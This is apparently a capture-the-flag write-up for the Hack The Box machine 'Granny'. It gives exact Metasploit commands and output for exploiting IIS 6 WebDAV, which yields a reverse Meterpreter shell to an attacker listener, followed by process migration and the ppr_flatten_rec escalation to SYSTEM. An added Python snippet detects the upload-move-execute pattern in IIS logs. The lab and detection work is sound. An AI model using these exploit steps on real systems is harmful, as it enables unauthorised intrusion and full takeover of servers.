As always, we start with an Nmap scan

root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST
Nmap scan report for 10.10.10.15
Host is up (0.022s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http	Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Fri, 18 Oct 2019 12:24:42 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.00 seconds

The only thing, and at the same time the most interesting one, is IIS 6.
I searched in searchsploit and Metasploit and got a million results.

Google recommends:

msf5 > use exploit/windows/iis/iis_webdav_upload_asp
msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Checking /metasploit262514588.asp
[*] Uploading 610960 bytes to /metasploit262514588.txt...
[*] Moving /metasploit262514588.txt to /metasploit262514588.asp...
[*] Executing /metasploit262514588.asp...
[*] Deleting /metasploit262514588.asp (this doesn't always work)...
[!] Deletion failed on /metasploit262514588.asp [403 Forbidden]
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2019-10-18 14:31:06 +0200

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 1724 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

And that is enough, but it is only a NETWORK SERVICE user…

So we migrate to another process:
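As an added example (not part of the original writeup), the sequence the module printed above leaves a recognisable trail in the IIS W3C logs: a PUT with a harmless extension, a MOVE of that same file, then a request for the same name with a script extension. The Python below parses a constructed log excerpt (the field set and values are assumed, not taken from the target) and flags that pattern, plus every WebDAV write method that nmap listed as risky.

```python
import os
from collections import defaultdict

# Methods nmap flagged as "potentially risky": each lets a client change server content.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS 6 maps to a script engine; a .txt moved onto one of these will execute.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".shtml"}

# Constructed IIS W3C log excerpt mirroring the module's upload/move/execute sequence.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-10-18 12:31:01 10.10.14.8 OPTIONS / 200
2019-10-18 12:31:02 10.10.14.8 PROPFIND /metasploit262514588.asp 404
2019-10-18 12:31:03 10.10.14.8 PUT /metasploit262514588.txt 201
2019-10-18 12:31:04 10.10.14.8 MOVE /metasploit262514588.txt 201
2019-10-18 12:31:05 10.10.14.8 GET /metasploit262514588.asp 200
2019-10-18 12:31:06 10.10.14.8 DELETE /metasploit262514588.asp 403
2019-10-18 12:40:00 10.10.14.9 GET /index.html 200
"""

def parse_w3c(text):
    """Turn W3C extended lines into dicts keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def detect_webdav_abuse(rows):
    """Return findings as (severity, client, message). Per client, remember files PUT
    with a non-script extension and then MOVEd; a later request for the same basename
    with a script extension is the upload-rename-execute pattern."""
    findings, state = [], defaultdict(dict)   # state[client][basename] -> put/moved
    for r in rows:
        client, method, uri = r["c-ip"], r["cs-method"], r["cs-uri-stem"]
        base, ext = os.path.splitext(uri)
        ok = r["sc-status"].startswith("2")
        if method in WRITE_METHODS:
            findings.append(("low", client, f"{method} {uri} -> {r['sc-status']}"))
        if method == "PUT" and ok and ext.lower() not in SCRIPT_EXTS:
            state[client][base] = "put"
        elif method == "MOVE" and ok and state[client].get(base) == "put":
            state[client][base] = "moved"
        elif ext.lower() in SCRIPT_EXTS and state[client].get(base) == "moved":
            findings.append(("high", client, f"upload+move+execute of {uri}"))
            state[client][base] = "reported"
    return findings
```

The MOVE destination travels in a request header that the default W3C fields do not record, which is why the detector keys on the source name and the later script-extension request rather than on the destination.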

exit
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_upload_asp) > use post/windows/manage/migrate
msf5 post(windows/manage/migrate) > set session 1
session => 1
msf5 post(windows/manage/migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (824)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3164
[+] Successfully migrated to process 3164
[*] Post module execution completed

And we use the suggester

msf5 post(windows/manage/migrate) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

There are many; from here on we try them until we find one that works.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf5 exploit(windows/local/ppr_flatten_rec) > options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name 	Current Setting  Required  Description
   ---- 	---------------  --------  -----------
   SESSION               	yes   	The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/ppr_flatten_rec) > set session 1
session => 1
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 172.16.10.164:4444
[*] Launching notepad to host the exploit...
[+] Process 3952 launched.
[*] Reflectively injecting the exploit DLL into 3952...
[*] Injecting exploit into 3952 ...
[*] Exploit injected. Injecting payload into 3952...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ppr_flatten_rec) > ifconfig
[*] exec: ifconfig

There was a detail here: it is using an IP that is not the right one: [*] Started reverse TCP handler on 172.16.10.164:4444

Options did not show me much, so you have to use advanced options.

Payload options (windows/meterpreter/reverse_tcp):

   Name  	Current Setting  Required  Description
   ----  	---------------  --------  -----------
   EXITFUNC  thread       	yes   	Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 	10.10.14.8   	yes   	The listen address (an interface may be specified)
   LPORT 	4444         	yes   	The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/local/ppr_flatten_rec) >

With that it works

msf5 exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 1244 launched.
[*] Reflectively injecting the exploit DLL into 1244...
[*] Injecting exploit into 1244 ...
[*] Exploit injected. Injecting payload into 1244...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2019-10-18 14:37:32 +0200

meterpreter > shell
Process 1732 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

And now we are admins 🙂

I liked it much more than Grandpa, and I have just got a new machine 🙂